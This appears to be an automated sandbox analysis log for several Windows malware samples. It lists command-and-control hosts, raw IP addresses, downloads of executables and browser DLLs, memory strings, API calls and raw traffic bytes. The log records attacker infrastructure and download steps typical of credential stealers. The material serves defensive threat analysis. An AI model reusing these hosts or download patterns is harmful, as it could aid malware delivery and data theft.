Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppejyk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: linislominyt11.at
Source: global traffic HTTP traffic detected: GET /f/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 85.192.63.46
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kekatmodj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: linislominyt11.at
Source: global traffic HTTP traffic detected: GET /newfile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 62.204.41.178
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgvwxic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxdfdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: linislominyt11.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 211.59.14.90 211.59.14.90
Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479561462.0000000000559000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/
Source: E69F.exe, 00000023.00000003.478816889.000000000054A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/M
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll4
Source: E69F.exe, 00000023.00000002.573881772.0000000000547000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
Source: E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllI
Source: E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllY
Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll1
Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllJ
Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll_
Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02
Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02&
Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02.
Source: E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02PowerShell
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp, 28E9.exe, 00000014.00000003.397866108.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 28E9.exe, 00000014.00000002.419058353.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1$D
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1wD
Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1xD
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 33.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 33.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 33.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 33.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: A658.exe, 0000001C.00000003.459744323.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.497283250.00000000008A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 33.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 33.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 33.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 33.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 33.exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 33.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0
Source: 33.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 33.exe.4.dr, softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 33.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 33.exe.4.dr, softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.20.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 33.exe.4.dr String found in binary or memory: http://www.opera.com0
Source: sqlite3.dll.20.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/-J
Source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.459744323.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonn
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: https://mozilla.org0
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 28E9.exe, 00000014.00000003.393400015.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: monsutiur4.com
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00407EDB LocalAlloc,LocalAlloc,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalFree,WideCharToMultiByte,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,lstrlen,lstrcpyn,LocalFree,LocalFree,GetFileSize,LocalAlloc,lstrlen,lstrcpyn,ReadFile,ReadFile,CloseHandle,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,LocalFree,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,LocalFree, 20_2_00407EDB
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 85.192.63.46
Source: global traffic HTTP traffic detected: GET /newfile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 62.204.41.178
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 19 00 00 00 1d 3d 5a e0 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 81 a1 55 00 37 ca 03 00 34 6f 8a 38 01 00 00 00 02 00 9c 03 00 00 0b c7 2c d9 be ef eb d2 bd 2e c3 67 08 06 02 00 40 eb c6 2e f0 6e ee d7 e9 bd f9 83 e3 fa 59 39 e6 76 88 b3 a1 01 bf 7d 48 17 e1 72 38 42 66 6e fd db 9f 15 05 ab 70 0b d5 82 12 70 ec e7 c1 ff 16 2a 96 7d 51 48 1f fa dc 42 85 ec 43 68 33 db 77 1e 9a 81 29 70 b3 46 06 9e d1 12 e5 06 3e 74 24 f7 32 37 ee ba 23 ee f5 6b fa 15 25 df 9d 08 31 c3 f6 6e 7e f5 e8 b0 59 f7 78 c7 30 68 85 3b 23 5d 01 09 b8 6e c2 17 d7 33 60 0a 44 17 75 7e 1d 99 98 81 c4 1d 96 cd ff 9e f8 ea 68 1f 79 de e5 d7 07 69 9e cc 31 79 ad 23 2e ad be cb 30 ab 72 a9 fd bb d6 02 59 9c 8d 4d eb 6b 0e cf fe 5e 64 99 f6 34 66 48 3d f7 db ec ea 8a c8 ff 70 a6 cb d4 20 6e 0c 06 d6 a0 00 66 2f c9 4a 1c 54 f7 d9 91 47 37 d3 64 d7 c1 c0 72 f1 05 fd b0 80 3d 13 24 a6 91 f2 1a 01 ce 40 9f ff 96 7f 28 5f fa 98 f2 5b e9 1e c2 1a 23 de bb 50 bc 7c 3d 59 f4 87 43 79 1d 39 c9 7a 61 c9 02 34 15 01 74 7d a9 05 84 bb 61 ce 24 5a ba ec 10 aa 1b d2 c0 09 15 16 f9 9f 57 cc 0e 41 fd a7 12 6b a3 c0 1c 33 ba 1a 5d 3f ac 4d 0a 15 b0 68 2b a1 af c5 fd 75 58 fb 96 a7 88 32 2e fa c8 53 43 96 d9 1c 94 e7 e7 89 44 aa bb 53 50 cb a4 b7 49 c6 9f a4 1f d4 da b3 cb ac 66 84 6f 45 b0 71 fa 9c 7b 5d 83 cb ad 6b 12 db 6e 53 62 1c 71 69 87 b6 43 b4 c9 eb c1 30 85 5b d6 06 3f bf 50 a3 4d eb 4b 22 f7 6a 71 15 37 47 4c ff 29 7f 81 ec d0 04 92 bb fd 3d f7 d9 5c b2 13 60 c7 b2 d4 db e1 60 43 83 27 90 b4 9a 69 ec d8 fd fe 0f 77 ac 28 6b dc 47 8b a5 0f c9 f6 de 42 74 d4 ce 4f 65 3f 31 fe 7e a7 db 55 a4 8f c1 bd 29 5a e3 96 99 24 71 dd 67 7f cf 4e 85 88 08 b0 7d a3 11 c5 33 58 68 96 3a c4 ae 68 f7 db f3 e0 98 ac 93 f8 17 55 8c d0 cd 54 3f 64 70 5c 23 ae b5 39 8f f2 13 23 0b a1 50 b9 8a 34 e5 4a 2e da 9e 1c b4 62 fc 53 d7 03 98 df ef d9 93 f4 26 07 44 37 ad 17 4e 47 5a ec 23 37 56 34 9b 05 0a 67 9a b5 fe 79 c4 ec 97 d1 f8 7e 96 1f c8 a9 f8 3c 17 66 84 2a fc c6 57 50 82 d5 e8 a1 74 bf 71 bf 36 54 94 86 a9 62 40 1d b8 f1 f1 77 aa 36 4b 89 de b7 01 a1 0b d8 7f cd 37 49 8b b1 11 44 0d b6 70 7d dc 33 66 8c ac d5 87 27 bd e6 d8 d2 26 60 17 47 58 3f bc 42 bb 56 3c f9 ce 8b 2a eb 95 78 bd ae db 35 ac 35 d4 bc 24 3a 8a 21 95 db 9e 9a 2d 00 53 6b 8c c5 e4 10 ae 5e f2 06 40 6e 5c 72 aa 78 ea 25 ed 76 40 15 bb 8e 0e 97 6d 57 87 ae f9 32 7f f6 f8 f5 d2 ea 62 b0 bf 0d a0 93 5e a1 e5 c6 61 dd 49 29 77 d2 dd e1 24 96 1d c0 31 b3 99 25 9a 65 af 6f 6b ad 68 ec 4c 33 30 f8 e5 c5 76 45 98 2f a2 ae ab 3d 11 59 6c 44 8d b2 7b f4 67 b9 9b 37 da 06 41 48 04 b0 22 6f 4c 8e 73 38 51 b0 be 92 30 ff a0 26 51 6b 9d d0 df 69 97 46 7d a5 2e 81 e7 61 fa 7c 75 a1 71 3f 7a f0 cb ab ff 70 ad c3 2a 29 db 6f 97 d0 d4 90 61 97 13 f0 7f 9c 83 c7 48 1e ef 26 f1 d4 14 3f 17 26 da f9 60 de ac 18 d5 20 aa 5b 54 47 8f 5f f9 bd 6d cd 7c 9d d3 78 7f 38 6e da ed 6d 1f 99 0f e0 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 cf d7 62 3e d6 48 74 57 7a 18 8f 9b a6 8b 53 58 3d 19 f0 79 52 b5 be 51 ae ad 6c da 16 7b 55 98 a6 e2 6e ee 2b 53 31 ef dd a4 d9 97 b4 79 37 55 46 3c 5b d4 0c 2a 5b 83 64 99 98 76 87 f2 bd e8 5f 42 a4 0d 9c ba 2b fe 36 f8 37 33 ad 19 7f 7b ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 2a ba b3 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 9f f4 ff 78 91 56 db c4 0d 13 13 5f 44 e0 92 24 18 4f c5 03 51 c8 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca f3 96 be 21 51 61 e9 fb 38 7c 8a 28 c8 c8 6b a1 d0 4a 9a 